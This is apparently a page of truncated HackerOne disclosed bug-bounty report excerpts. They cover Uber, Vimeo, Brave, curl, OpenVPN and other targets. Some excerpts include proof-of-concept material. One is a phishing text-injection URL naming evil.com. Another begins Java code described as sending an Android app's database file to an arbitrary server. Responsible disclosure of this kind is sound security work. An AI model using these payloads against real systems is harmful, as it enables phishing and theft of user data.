HackerOne Reports
Search through disclosed security reports
10,350 reports found
Showing 801 - 820
INTRO: i want to report a text injection and a missconfiguration of the 404 page which can be used in phishing at faspex.uber.com EXPLOITABILITY: PoC link : https://faspex.uber.com/faspex.uber.com/%2f../It%20has%20been%20changed%20by%20a%20new%20one%20http://www.evil.com%20so%20go%20to%20the%20new%20one%20since%20this%20one IMPACT: The issue can be used for an attacker to spoof content and phishing purposes FIX: Use a Predefined 404 page will …
https://bugs.php.net/bug.php?id=70713 I think this bugs is still security issue since this bug can be still triggered remotely in some real world&apps. Example: https://github.com/zendframework/zend-loader/blob/ceb32b5129525e1f19b01f37dbbcc6398b0a9635/src/ClassMapAutoloader.php#L210-L215 ``` array_walk($parts, function ($value, $key) use (&$parts) { if ($value === '..') { unset($parts[$key], $parts[$key-1]); $parts = array_values($parts); <== ['x', 'y', '..'] will be changed into ['x'] …
Vulnerability Name: User Enumeration and Information Disclosure Description: It was possible to enumerate users for SquareSpace admin console in uber-movement. Please find below details of users enumerated: 1. [email protected] 2. [email protected] Information Disclosure in https://uber-movement.squarespace.com/?format=json helped me enumerate user for https://uber-movement.squarespace.com/config Please find attach document for proof of concept.
Hi team First I think this vulnerability doesn't fall at your bug bounty program but this is a bad design that should fix right now cause if an attacker get admin access he still can upload a malicious file in client server side. I saw that Logo & Log in …
Hello Jeremy and Vimeo Security Team, There is a vulnerability in Vimeo which allows any user to watch password video without the password. A user can like a passworded video without password, then the user can watch the video on Couchmode without the password. POC link : http://opnsec.com/vimeo/PasswordBypass.html Description : …
### Multiple Accounts can be created using the similar X-csrf token ! I have tested and created around 45+ accounts in this way ! Take a look ! in attachment ! i have created account range from test1-test27 3 times ! File is also attached for tested creating accounts !
Description ==================== Adding a mobile number for 2-factor authentication is vulnerable to CSRF, allowing an attacker to bypass 2-factor authentication. An attacker would be able to force the logged in user to add a new mobile number for 2-factor authentication. The attacker would then receive the SMS code and automatically …
## Summary: Brave browser has built-in WebTorrent extension. After it finishes downloading a torrent, it serves the downloaded files on a local HTTP server listening on a random port. The problem is that the local HTTP server doesn't check for the hostname of the requesters, so a malicious remote website …
## Summary: https://www.jamieweb.net still support TLS 1.0 protocol which has several flaws. ## Vulnerability: With a SSL security scanner i was able to identify that an insecure transportation security protocol (TLS 1.0) is still supported by your web server. TLS 1.0 has several flaws. An attacker can cause connection failures …
> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report! **Summary:** [add summary of …
curl's HSTS functionality fail when multiple URLs are requested serially. Using its HSTS support, curl can be instructed to use HTTPS instead of using an insecure clear-text HTTP step even when HTTP is provided in the URL. This HSTS mechanism would however suprisingly be ignored by subsequent transfers when done …
## Summary: Build jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91) download dependencies from `build.openvpn.net` and `www.oberhumer.com`over an insecure channel (`http`, _not_ `https`) and do not check their integrity in any way. This opens the door to person-in-the-middle attacks, whereby an attacker controlling an intermediate node on the network path …
Followup from #311460 #Summary Self xss and CSRF are both out of scope, but when paired it is possible to create an attack on a user. #Description A favorites folder with an xss payload for a name will launch when saving an image to said folder. This can be verified …
Hi team, While performing security testing of your website i have found the vulnerability called Clickjacking. What is Clickjacking ? Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they …
**Summary:** Service ```xml <service android:enabled="true" android:exported="true" android:name="net.gotev.uploadservice.UploadService"/> ``` enabled and exported. If it's exported, it means that any third party application can access it and send arbitrary data into it. The following code sends main database file to arbitrary server (I used http://google.com/zaheck): ```java UploadTaskParameters params = new UploadTaskParameters(); params.setId("1337"); …
## Summary: The attribute `download` in a `a` tag allows for download the `href` target to file and saving it locally. In mozilla and chrome, it is forbidden to download local file via `file:// ..`, in Brave however this is not enforced and it is not clear to the user …